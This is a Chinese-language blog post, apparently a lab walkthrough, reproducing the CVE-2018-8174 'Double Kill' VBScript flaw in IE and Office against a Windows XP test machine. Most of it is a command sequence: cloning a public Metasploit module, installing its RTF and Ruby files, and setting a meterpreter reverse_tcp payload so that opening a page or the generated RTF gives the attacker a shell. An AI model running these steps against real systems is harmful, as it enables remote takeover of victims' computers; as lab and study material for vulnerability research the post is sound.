CVE-2018-8174 双杀0day漏洞复现

0x00 | 漏洞描述

最近360核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用0day漏洞的APT攻击,捕获到了全球首例利用浏览器0day漏洞的新型Office文档攻击,我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。

0x01 | 漏洞细节


可以利用计算器入侵你电脑,由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

0x02 | 环境准备


环境准备:
攻击机:Kali 2.0 (2019.4)
靶机:Windows XP
攻击机IP:10.0.0.1/8 交换机:10.0.0.254
靶机IP:10.0.0.3/8 交换机:10.0.0.254


0x01 git CVE-2018-8174利用模块至本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

0x02 将CVE-2018-8174.rtf复制到exploits目录下

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

0x03 将CVE-2018-8174.rb复制到windows/fileformat/目录下

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

0x04 环境准备就绪打开msf进行配置,记得reload_all

msfconsole #打开msf
use exploit/windows/fileformat/CVE-2018-8174 #加载modules
set payload windows/meterpreter/reverse_tcp #设置payload
set srvhost Your Web #设置srvhost
set lhost Your IP #设置IP 
exploit #开始监听!

0x05 打开靶机IE访问目的地址返回getshell

0x06 或者复制/root/.msf4/local目录中的 msf.rtf 文件到目标主机上使用word文档打开

点赞

发表评论

电子邮件地址不会被公开,只有你知道( ̄▽ ̄)"